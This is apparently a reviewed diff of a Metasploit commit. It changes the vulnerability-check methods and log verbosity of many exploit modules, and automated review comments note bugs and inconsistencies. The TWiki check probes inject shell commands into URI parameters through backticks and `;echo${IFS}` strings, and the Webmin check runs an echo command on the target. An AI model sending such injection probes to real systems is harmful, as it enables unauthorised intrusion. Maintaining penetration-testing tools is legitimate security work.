@@ -109,17 +109,17 @@ class Metasploit3 < Msf::Exploit::Remote # Example footer: v2.6.1 ©2008 Fonality # if response.body =~ /(v2\.(?:[0-5]\.\d|6\.[0-1]))\s{2}©200[0-8] Fonality/ if response.body =~ /(v2\.6\.1)\s{2}©2008 Fonality/ - print_status "Trixbox #{$1} detected!" - return Exploit::CheckCode::Vulnerable + vprint_status "Trixbox #{$1} detected!" + return Exploit::CheckCode::Appears end - print_status 'The target may be skinned making detection too difficult' + vprint_status 'The target may be skinned making detection too difficult' if response.body =~ /trixbox - User Mode/ return Exploit::CheckCode::Detected - else - return Exploit::CheckCode::Unknown end + + return Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb index cc7aeab507..0d1d620094 100644 --- a/modules/exploits/unix/webapp/twiki_history.rb +++ b/modules/exploits/unix/webapp/twiki_history.rb @@ -67,12 +67,12 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => test_url }, 25) if (not res) or (res.code != 404) - print_warning("WARNING: The test file exists already!") - return Exploit::CheckCode::Safe + vprint_warning("WARNING: The test file exists already!") + return Exploit::CheckCode::Unknown # Need to try again end # try to create it - print_status("Attempting to create #{test_url} ...") + vprint_status("Attempting to create #{test_url} ...") rev = rand_text_numeric(1+rand(5)) + ' `touch ' + test_file + '`#' res = send_request_raw({ 'uri' => cmd_base + Rex::Text.uri_encode(rev) @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => cmd_base + Rex::Text.uri_encode(rev) }, 25) if (not res) or (res.code != 200) - print_warning("WARNING: unable to remove test file (#{test_file})") + vprint_warning("WARNING: unable to remove test file (#{test_file})") end return Exploit::CheckCode::Vulnerable 
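Review bot: The converted calls in twiki_history.rb keep a literal `WARNING:` prefix inside `vprint_warning(...)`, which already labels the line as a warning, so the message is double-tagged; twiki_search.rb drops the prefix in its first hunk but keeps it in its second, so the two modules end up inconsistent. Dropping the prefix in all three places, e.g. `vprint_warning("The test file exists already!")`, matches the rest of the commit. Since this `check` creates and then removes a file on the target, a one-line comment above the `rev = ...` line noting that the check is intrusive would help operators choose when to run it. The enclosing method spans both hunks and starts before the first.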
diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb index f96efa6af0..5a931d0f21 100644 --- a/modules/exploits/unix/webapp/twiki_maketext.rb +++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -153,15 +153,15 @@ class Metasploit3 < Msf::Exploit::Remote if res.body =~ /This site is running TWiki version.*TWiki-(\d\.\d\.\d)/ version = $1 - print_status("Version found: #{version}") + vprint_status("Version found: #{version}") if version < "5.1.3" return Exploit::CheckCode::Appears else - return Exploit::CheckCode::Safe + return Exploit::CheckCode::Detected end end - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb index a09df6375b..2af281e256 100644 --- a/modules/exploits/unix/webapp/twiki_search.rb +++ b/modules/exploits/unix/webapp/twiki_search.rb @@ -62,12 +62,12 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => test_url }, 25) if (not res) or (res.body.match(content)) - print_warning("WARNING: The test file exists already!") - return Exploit::CheckCode::Safe + vprint_warning("The test file exists already!") + return Exploit::CheckCode::Unknown # Need to try again with a different file end # try to create it - print_status("Attempting to create #{test_url} ...") + vprint_status("Attempting to create #{test_url} ...") search = rand_text_numeric(1+rand(5)) + "\';echo${IFS}" + content + "${IFS}>" + test_file + ".txt;#\'" res = send_request_raw({ 'uri' => cmd_base + Rex::Text.uri_encode(search) @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => cmd_base + Rex::Text.uri_encode(search) }, 25) if (not res) or (res.code != 200) - print_warning("WARNING: unable to remove test file (#{test_file})") + vprint_warning("WARNING: unable to remove test file (#{test_file})") end return Exploit::CheckCode::Vulnerable 
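Review bot: In twiki_maketext.rb the new `Appears`/`Detected` split is decided by `version < "5.1.3"`, a lexicographic string comparison, and by a capture `(\d\.\d\.\d)` that only accepts single-digit components, so a release like `5.1.10` is read as `5.1.1` and reported as `Appears`. Capturing `(\d+(?:\.\d+)+)` and comparing `Gem::Version.new(version) < Gem::Version.new("5.1.3")` avoids both problems without a new dependency. The enclosing `check` method starts before this hunk.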
diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb index 44ee6388a8..c18897d482 100644 --- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb +++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb @@ -343,7 +343,7 @@ class Metasploit3 < Msf::Exploit::Remote node_id = get_node unless node_id.nil? - return Msf::Exploit::CheckCode::Vulnerable + return Msf::Exploit::CheckCode::Appears end res = send_request_cgi({ @@ -351,10 +351,10 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /"simpleversion": "v=5/ - return Msf::Exploit::CheckCode::Detected + return Msf::Exploit::CheckCode::Appears end - return Msf::Exploit::CheckCode::Unknown + return Msf::Exploit::CheckCode::Safe end def on_new_session(session) diff --git a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb index becbb997bc..dcf88c8a12 100644 --- a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb +++ b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index 5e932cffe7..9de059083a 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" - print_status("#{peer} - Attempting to login...") + vprint_status("#{peer} - Attempting to login...") data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" 
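Review bot: The login body in webmin_show_cgi_exec.rb is built by string interpolation, `data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"`, so a credential containing `&`, `=`, `%` or `+` produces a malformed form body and the check reports an authentication failure for a valid account. Encoding each value, `user=#{Rex::Text.uri_encode(datastore['USERNAME'])}&pass=#{Rex::Text.uri_encode(datastore['PASSWORD'])}`, or passing them through `vars_post`, fixes this. The enclosing `check` method continues past this hunk.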
@@ -76,14 +76,14 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/ - print_good "#{peer} - Authentication successful" + vprint_good "#{peer} - Authentication successful" session = res.headers['Set-Cookie'].split("sid=")[1].split(";")[0] else - print_error "#{peer} - Authentication failed" - return Exploit::CheckCode::Unknown + vprint_error "#{peer} - Service found, but authentication failed" + return Exploit::CheckCode::Detected end - print_status("#{peer} - Attempting to execute...") + vprint_status("#{peer} - Attempting to execute...") command = "echo #{rand_text_alphanumeric(rand(5) + 5)}" @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.message =~ /Document follows/ - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/webtester_exec.rb b/modules/exploits/unix/webapp/webtester_exec.rb index 96bb9c7cae..b77b968d9e 100644 --- a/modules/exploits/unix/webapp/webtester_exec.rb +++ b/modules/exploits/unix/webapp/webtester_exec.rb @@ -59,16 +59,16 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({ 'uri' => normalize_uri(target_uri.path) }) if not res - print_error("#{peer} - Connection timed out") + vprint_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown end if res.body =~ /Eppler Software/ if res.body =~ / - v5\.1\.20101016/ - print_status("#{peer} - Found version: 5.1.20101016") - return Exploit::CheckCode::Vulnerable + vprint_status("#{peer} - Found version: 5.1.20101016") + return Exploit::CheckCode::Appears elsif res.body =~ / - v(5\.[\d\.]+)/ - print_status("#{peer} - Found version: #{$1}") + vprint_status("#{peer} - Found version: #{$1}") return Exploit::CheckCode::Appears else return Exploit::CheckCode::Detected 
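Review bot: The second webmin_show_cgi_exec.rb hunk now returns `Vulnerable`, the strongest check code, on `res.code == 200 and res.message =~ /Document follows/`, which only inspects the HTTP status line; the random token sent in `command = "echo #{rand_text_alphanumeric(rand(5) + 5)}"` is never looked for in the response, so a page that merely renders is enough to claim confirmed execution. Keeping the token in a local, `marker = rand_text_alphanumeric(rand(5) + 5)` and `command = "echo #{marker}"`, and testing `res.body.to_s.include?(marker)` makes `Vulnerable` mean what it says. The code between the two hunks is outside this view.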
diff --git a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb index 321429410d..bdb1719f9c 100644 --- a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb +++ b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb index c8cd1a4cec..d52ecda3a8 100644 --- a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb +++ b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/xoda_file_upload.rb b/modules/exploits/unix/webapp/xoda_file_upload.rb index b33a939eb8..0ad5036393 100644 --- a/modules/exploits/unix/webapp/xoda_file_upload.rb +++ b/modules/exploits/unix/webapp/xoda_file_upload.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /Upload a file/ - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/zeroshell_exec.rb b/modules/exploits/unix/webapp/zeroshell_exec.rb index 223c23387f..8558d6edcb 100644 --- a/modules/exploits/unix/webapp/zeroshell_exec.rb +++ b/modules/exploits/unix/webapp/zeroshell_exec.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote end unless password.nil? - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe 
diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb
index b8daa7a0c7..3f8dab74c2 100644
--- a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb
@@ -81,19 +81,19 @@ class Metasploit3 < Msf::Exploit::Remote
 })
 if res and res.code == 200
 if res.body =~ /ZM - Login<\/title>/
- print_error("#{peer} - Authentication failed")
- return Exploit::CheckCode::Unknown
+ vprint_error("#{peer} - Service found, but authentication failed")
+ return Exploit::CheckCode::Detected
 elsif res.body =~ /v1.2(4\.\d+|5\.0)/
 return Exploit::CheckCode::Appears
 elsif res.body =~ /<title>ZM/
 return Exploit::CheckCode::Detected
 end
 end
- return Exploit::CheckCode::Safe
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
- print_error("#{peer} - Connection failed")
+ vprint_error("#{peer} - Connection failed")
+ return Exploit::CheckCode::Unknown
 end
- return Exploit::CheckCode::Unknown
+ return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb
index adbe4790d0..e4508a5448 100644
--- a/modules/exploits/unix/webapp/zpanel_username_exec.rb
+++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def check
 res = send_request_raw({'uri' => normalize_uri(target_uri.path)})
 if not res
- print_error("#{peer} - Connection timed out")
+ vprint_error("#{peer} - Connection timed out")
 return Exploit::CheckCode::Unknown
 end
diff --git a/modules/exploits/windows/arkeia/type77.rb b/modules/exploits/windows/arkeia/type77.rb
index a9ad2d65b4..3fce25e2a8 100644
--- a/modules/exploits/windows/arkeia/type77.rb
+++ b/modules/exploits/windows/arkeia/type77.rb
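Review bot: The `rescue` list in zoneminder_packagecontrol_exec.rb names `::Rex::ConnectionTimeoutp`, which does not match the `::Rex::ConnectionTimeout` class used elsewhere in the framework; the constant is resolved only when an exception propagates, so a timeout surfaces as a `NameError` instead of the new `vprint_error`/`Unknown` path this commit adds. The line should read `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout`. The version match `/v1.2(4\.\d+|5\.0)/` also leaves its first dot unescaped, unlike the regexes this commit tightens in the brightstor and sami modules.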
@@ -64,18 +64,18 @@ class Metasploit3 < Msf::Exploit::Remote
 return Exploit::CheckCode::Safe
 end
- print_status("Arkeia Server Information:")
+ vprint_status("Arkeia Server Information:")
 info.each_pair { |k,v|
- print_status(" #{k + (" " * (30-k.length))} = #{v}")
+ vprint_status(" #{k + (" " * (30-k.length))} = #{v}")
 }
 if (info['System'] !~ /Windows/)
- print_status("This module only supports Windows targets")
+ vprint_status("This module only supports Windows targets")
 return Exploit::CheckCode::Detected
 end
 if (info['Version'] =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/)
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 end
 return Exploit::CheckCode::Safe
diff --git a/modules/exploits/windows/backupexec/remote_agent.rb b/modules/exploits/windows/backupexec/remote_agent.rb
index 6f11e89844..2fd714b4ab 100644
--- a/modules/exploits/windows/backupexec/remote_agent.rb
+++ b/modules/exploits/windows/backupexec/remote_agent.rb
@@ -72,12 +72,12 @@ class Metasploit3 < Msf::Exploit::Remote
 def check
 info = ndmp_info()
 if (info and info['Version'])
- print_status(" Vendor: #{info['Vendor']}")
- print_status("Product: #{info['Product']}")
- print_status("Version: #{info['Version']}")
+ vprint_status(" Vendor: #{info['Vendor']}")
+ vprint_status("Product: #{info['Product']}")
+ vprint_status("Version: #{info['Version']}")
 if (info['Vendor'] =~ /VERITAS/i and info['Version'] =~ /^(4\.2|5\.1)$/)
- return Exploit::CheckCode::Detected
+ return Exploit::CheckCode::Appears
 end
 end
 return Exploit::CheckCode::Safe
diff --git a/modules/exploits/windows/brightstor/lgserver_multi.rb b/modules/exploits/windows/brightstor/lgserver_multi.rb
index 2ab16594ab..98439c43e1 100644
--- a/modules/exploits/windows/brightstor/lgserver_multi.rb
+++ b/modules/exploits/windows/brightstor/lgserver_multi.rb
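Review bot: The padding expression kept in arkeia/type77.rb, `k + (" " * (30-k.length))`, raises `ArgumentError: negative argument` as soon as a key returned by the server is longer than 30 characters, so `check` aborts on unexpected server info. `vprint_status(" #{k.ljust(30)} = #{v}")` pads the same way and never goes negative. The enclosing `check` method starts before this hunk.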
@@ -59,8 +59,8 @@ class Metasploit3 < Msf::Exploit::Remote disconnect - if ( ver and ver =~ /11.1.742/ ) - return Exploit::CheckCode::Vulnerable + if ( ver and ver =~ /11\.1\.742/ ) + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb index 69f2d859d9..5fdf8e7adb 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb @@ -58,8 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote disconnect - if ( ver and ver =~ /11.1.742/ ) - return Exploit::CheckCode::Vulnerable + if ( ver and ver =~ /11\.1\.742/ ) + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb index 6184fea782..4a0dae440c 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb @@ -58,8 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote disconnect - if ( ver and ver =~ /11.1.742/ ) - return Exploit::CheckCode::Vulnerable + if ( ver and ver =~ /11\.1\.742/ ) + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb index b2350639b3..0fe297e944 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb 
@@ -57,8 +57,8 @@ class Metasploit3 < Msf::Exploit::Remote disconnect - if ( ver and ver =~ /11.1.742/ ) - return Exploit::CheckCode::Vulnerable + if ( ver and ver =~ /11\.1\.742/ ) + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb index 85ec1cfdfd..41d788b2dd 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb @@ -74,7 +74,15 @@ class Metasploit3 < Msf::Exploit::Remote startxrefs = pdf_objects[2] root_obj = pdf_objects[3] - output = basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxrefs.last) + output = basic_social_engineering_exploit({ + :xref_trailers => xref_trailers, + :root_obj => root_obj, + :stream => stream, + :trailers => trailers, + :file_name => file_name, + :exe_name => exe_name, + :startxref => startxrefs.last + }) print_status("Parsing Successful. Creating '#{datastore['FILENAME']}' file...") file_create(output) @@ -165,7 +173,15 @@ class Metasploit3 < Msf::Exploit::Remote end - def basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxref) + def basic_social_engineering_exploit(opts = {}) + + xref_trailers = opts[:xref_trailers] + root_obj = opts[:root_obj] + stream = opts[:stream] + trailers = opts[:trailers] + file_name = opts[:file_name] + exe_name = opts[:exe_name] + startxref = opts[:startxref] file_name = file_name.split(/\//).pop.to_s diff --git a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb index ade7b85090..32095986ce 100644 --- a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb +++ b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb 
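Review bot: The new `basic_social_engineering_exploit(opts = {})` in adobe_pdf_embedded_exe.rb reads every argument with `opts[:key]`, so a caller that omits or misspells a key now gets a silent `nil` where the positional signature used to fail with an arity error. Using `opts.fetch(:xref_trailers)` and likewise for the other six keys raises `KeyError` at the call site instead; Ruby keyword arguments would give the same guarantee with less code. The method body continues past the end of this hunk.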
@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect if (banner =~ /3Com 3CDaemon FTP Server Version 2\.0/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/ability_server_stor.rb b/modules/exploits/windows/ftp/ability_server_stor.rb index 7cdc971e4f..5f48396b1f 100644 --- a/modules/exploits/windows/ftp/ability_server_stor.rb +++ b/modules/exploits/windows/ftp/ability_server_stor.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect if banner =~ /Ability Server 2\.34/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears else if banner =~ /Ability Server/ return Exploit::CheckCode::Detected diff --git a/modules/exploits/windows/ftp/cesarftp_mkd.rb b/modules/exploits/windows/ftp/cesarftp_mkd.rb index e657d375ce..ea1babc50c 100644 --- a/modules/exploits/windows/ftp/cesarftp_mkd.rb +++ b/modules/exploits/windows/ftp/cesarftp_mkd.rb @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner =~ /CesarFTP 0\.99g/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb index 05e8bda803..18d38e518a 100644 --- a/modules/exploits/windows/ftp/dreamftp_format.rb +++ b/modules/exploits/windows/ftp/dreamftp_format.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote banner = sock.get(-1,3) disconnect if (banner =~ /Dream FTP Server/) - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/easyfilesharing_pass.rb b/modules/exploits/windows/ftp/easyfilesharing_pass.rb index b1b8ac68f1..ab5a97838f 100644 --- a/modules/exploits/windows/ftp/easyfilesharing_pass.rb 
+++ b/modules/exploits/windows/ftp/easyfilesharing_pass.rb @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner =~ /Easy File Sharing FTP Server/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb index 58958b34df..0805ac2063 100644 --- a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner =~ /BigFoolCat/) # EasyFTP Server has undergone several name changes - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/easyftp_list_fixret.rb b/modules/exploits/windows/ftp/easyftp_list_fixret.rb index 4ec0fcad81..e230140ad1 100644 --- a/modules/exploits/windows/ftp/easyftp_list_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_list_fixret.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner =~ /BigFoolCat/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb index 4e45a2818d..6368dcbbef 100644 --- a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner =~ /BigFoolCat/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/freefloatftp_user.rb b/modules/exploits/windows/ftp/freefloatftp_user.rb index 959c94b5ed..a85fd0f6e5 100644 --- a/modules/exploits/windows/ftp/freefloatftp_user.rb 
+++ b/modules/exploits/windows/ftp/freefloatftp_user.rb
@@ -57,6 +57,7 @@ class Metasploit4 < Msf::Exploit::Remote
 connect
 disconnect
 if (banner =~ /FreeFloat/)
+ # Software is never updated, so if you run this you're f*cked.
 return Exploit::CheckCode::Vulnerable
 else
 return Exploit::CheckCode::Safe
diff --git a/modules/exploits/windows/ftp/freefloatftp_wbem.rb b/modules/exploits/windows/ftp/freefloatftp_wbem.rb
index 27718f7679..a035752d21 100644
--- a/modules/exploits/windows/ftp/freefloatftp_wbem.rb
+++ b/modules/exploits/windows/ftp/freefloatftp_wbem.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
 disconnect
 if banner =~ /FreeFloat/
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Detected
 else
 return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/ftp/freeftpd_pass.rb b/modules/exploits/windows/ftp/freeftpd_pass.rb
index 1c8711caa6..285b4dd012 100644
--- a/modules/exploits/windows/ftp/freeftpd_pass.rb
+++ b/modules/exploits/windows/ftp/freeftpd_pass.rb
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
 # All versions including and above version 1.0 report "220 Hello, I'm freeFTPd 1.0"
 # when banner grabbing.
 if banner =~ /freeFTPd 1\.0/
- return Exploit::CheckCode::Detected
+ return Exploit::CheckCode::Appears
 else
 return Exploit::CheckCode::Safe
diff --git a/modules/exploits/windows/ftp/freeftpd_user.rb b/modules/exploits/windows/ftp/freeftpd_user.rb
index db8e0d7a3c..ef572effe0 100644
--- a/modules/exploits/windows/ftp/freeftpd_user.rb
+++ b/modules/exploits/windows/ftp/freeftpd_user.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
 connect
 disconnect
 if (banner =~ /freeFTPd 1\.0/)
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 end
 return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb
index d773ba4cc8..cc334f2643 100644
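Review bot: The added comment in freefloatftp_user.rb explains why this module keeps `Vulnerable` where the rest of the commit downgrades banner matches to `Appears` or `Detected`, which is useful, but its wording is not what a reader expects in a module header. Something like `# FreeFloat FTP Server has no fixed release, so a banner match is reported as Vulnerable.` carries the same justification. The enclosing `check` method starts before this hunk.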
--- a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb +++ b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote def check connect disconnect - print_status("FTP Banner: #{banner}".strip) + vprint_status("FTP Banner: #{banner}".strip) if banner =~ /Golden FTP Server ready v(4\.\d{2})/ and $1 == "4.70" return Exploit::CheckCode::Appears else diff --git a/modules/exploits/windows/ftp/httpdx_tolog_format.rb b/modules/exploits/windows/ftp/httpdx_tolog_format.rb index a1263b6f66..844a06de10 100644 --- a/modules/exploits/windows/ftp/httpdx_tolog_format.rb +++ b/modules/exploits/windows/ftp/httpdx_tolog_format.rb @@ -125,9 +125,9 @@ For now, that will have to be done manually. def check connect disconnect - print_status("FTP Banner: #{banner}".strip) + vprint_status("FTP Banner: #{banner}".strip) if banner =~ /httpdx.*\(Win32\)/ - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/netterm_netftpd_user.rb b/modules/exploits/windows/ftp/netterm_netftpd_user.rb index 1fd6e91a82..4e756c2a11 100644 --- a/modules/exploits/windows/ftp/netterm_netftpd_user.rb +++ b/modules/exploits/windows/ftp/netterm_netftpd_user.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect if (banner =~ /NetTerm FTP server/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/open_ftpd_wbem.rb b/modules/exploits/windows/ftp/open_ftpd_wbem.rb index 87a0fa43d3..93fad47728 100644 --- a/modules/exploits/windows/ftp/open_ftpd_wbem.rb +++ b/modules/exploits/windows/ftp/open_ftpd_wbem.rb @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if banner =~ /\*\* Welcome on \*\*/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected else return Exploit::CheckCode::Unknown end 
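Review bot: The open_ftpd_wbem.rb hunk changes the banner match to `Detected` but leaves the `else` branch returning `Exploit::CheckCode::Unknown`, whereas the neighbouring freefloatftp_wbem.rb and freeftpd_pass.rb hunks in this same commit return `Safe` when the banner does not match, and vicidial and vbulletin are explicitly changed from `Unknown` to `Safe`. Unless the difference is deliberate, `return Exploit::CheckCode::Safe` keeps the modules consistent. The enclosing `check` method starts before this hunk.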
